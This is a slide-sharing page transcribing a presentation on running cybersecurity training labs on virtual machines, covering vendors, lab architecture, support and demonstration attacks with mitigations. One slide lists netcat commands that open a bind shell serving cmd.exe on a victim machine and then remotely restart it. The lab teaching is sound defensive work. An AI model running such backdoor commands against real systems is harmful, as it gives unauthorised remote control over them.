1 / 23

Cybersecurity Training in a Virtual Environment By C hinedum Irrechukwu

Cybersecurity Training in a Virtual Environment By C hinedum Irrechukwu. Areas to be covered. Brief introduction to virtualization General Benefits of virtualization Dominant vendors and common products Lab Architecture Lab technical support Lab Exercise Demonstration Summary Questions.

brigid
Download Presentation

Cybersecurity Training in a Virtual Environment By C hinedum Irrechukwu

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Cybersecurity Training in a Virtual EnvironmentBy ChinedumIrrechukwu

  2. Areas to be covered • Brief introduction to virtualization • General Benefits of virtualization • Dominant vendors and common products • Lab Architecture • Lab technical support • Lab Exercise Demonstration • Summary • Questions

  3. Introduction to Virtualization • A software entity can have and share access to underlying hardware resources. • The software entity can be an application, a network or a virtual machine. • Humans can interact with it as if it is a separate entity (e.g a separate physical machine) • A software layer exists that allows for the creation and deployment of virtual machines

  4. General Benefits • Multiple guest operating systems can exist on one physical machine • More productivity and less cost • Additional energy and real estate cost savings • Software testing before deployment (patches) • Fast restore in the event of VM crash or corruption

  5. Dominant Vendors and Common Products • Vmware • VSphere, Esxi, Vcloud Director • Citrix (Xen) • Xen is open source • Citrix version has an excellent management interface • Alternative choice to the VMware product line • Linux Kernel Virtual Machine • High potential but no well developed management interface

  6. Common Products for Single Users • Enterprise class virtualization products • Vmware, Citrix Xen and Linux KVM can • Create multiple virtual networks • Allow numerous connections to the servers • Allow the clustering of servers and provide a good management interface • Provide a way to authenticate users • Common Products for Single users • Vmware workstation, Vmware player etc • Oracle Virtualbox • Virtual PC

  7. Lab Architecture • Consists of multiple physical servers • Group of servers is managed by a central server • Central server should have ability to connect into an authentication server • VPN might be needed for security • Choice between web based connection to VM or IP based remote connection (RDP or SSH).

  8. Lab Architecture Diagram http://www.cisco.com/en/US/solutions/collateral/ns340/ns517/ns224/ns668/net_implementation_white_paper0900aecd8053495a.html

  9. Extra Notes on Lab Architecture • The number of physical servers should depend on the number of students and the storage you need • Cost increases with each additional server you add • Consider the technical support required for the system

  10. Lab Support • Lab may require additional technical support from IT staff • Both Instructors and students may need help with connectivity • Students may require help with lab exercises • Consider having IT staff help with this area • Consider hiring teaching assistants or lab assistants to help with lab exercises

  11. Potential Technical Issues • VPN Connectivity • Installed Firewall on client PCs • Installed Internet Security (Antivirus)software on client PCs • User Based Issues • Inexperienced users • Incorrectly applied instructions

  12. Attacks • Online password attack (Windows) • Attempt to crack a password on a remote system • Victim will be a windows system • Backdoor attack • Insider installed malicious program that allows connections to be made to victim system • Trojan attack • Malicious program that appears harmless but performs some other action

  13. Online Password Attack (Windows) • Server Message Block used for file sharing • SMB clients and servers communicate about shared resources http://www.highteck.net/EN/Application/Application_Layer_Functionality_and_Protocols.html

  14. Online Password Attack (Contd) • Attacker’s Objective • Retrieve or discover a privileged user’s password • Attack Method • Automate a dictionary password attack against a Windows share • A custom script can and will be used • Mitigation/Prevention/Detection • Apply maximum logon attempts • Security personnel should review log files

  15. Online Password Attack Contd. (Demo) • Nmap scan of network • Enumerate shares of the Windows machines • Run script that attempts to connect to share with a privileged account • Connection attempt will use multiple dictionary passwords • Connect to the VM using a terminal application

  16. Online Password Attack on a Windows (Contd.) • Learning Objectives • Importance of using a complex password • Importance of enforcing maximum logon attempts • Importance of renaming the administrator account • Understanding the effectiveness of social engineering • Knowing the username is half the battle • Aha moment! http://quite-rightly.blogspot.com/2011/07/congress-let-there-be-edison-light-bulb.html

  17. Backdoor Attack • Attacker’s objective • Execute remote commands on victim system • Attack Method • Insider installs backdoor program on a victim machine • Backdoor listens for and accepts incoming connections http://technicaljones.com/index.php?page=91

  18. Backdoor Attack Contd. • Mitigation/Prevention/Detection • Physical security reduces the risk • Anti-virus scans are also effective http://kyrionhackingtutorials.com/2010/10/what-are-backdoors/

  19. Backdoor Attack Steps • Install backdoor (netcat) on victim computer • Configure backdoor to accept incoming connections • Execute “nc –l –v –p 5555 –e cmd.exe” on server or victim • Connect to the victim machine • Execute “nc –vn <IP address> 5555” • Execute command on remote system from attack machine • Execute “shutdown –r –t 20” to shut down and restart the victim system in 20 seconds

  20. Trojan Attack • Attacker’s Objective • Successfully install or execute malware on a victim system • Trojan installs malware but pretends to be legitimate software http://www.buzzle.com/articles/trojan-horse-virus-removal.html

  21. Trojan Attack (Contd.) • Attack Method • Malicious web downloads • Email Attachments • Mitigation/Prevention/Detection • Up to date anti-virus definitions • User training

  22. Take Home Message • Virtualization is useful for hands-on exercises. • Provides flexibility to create different lab environments • Cost is proportional to the number of students using the lab • Lab support is useful and should be considered • Virtual labs help instructors to achieve learning objectives and improve experiential learning.

  23. Questions • Any questions ??? • Email: chinedum.irrechukwu@umuc.edu

More Related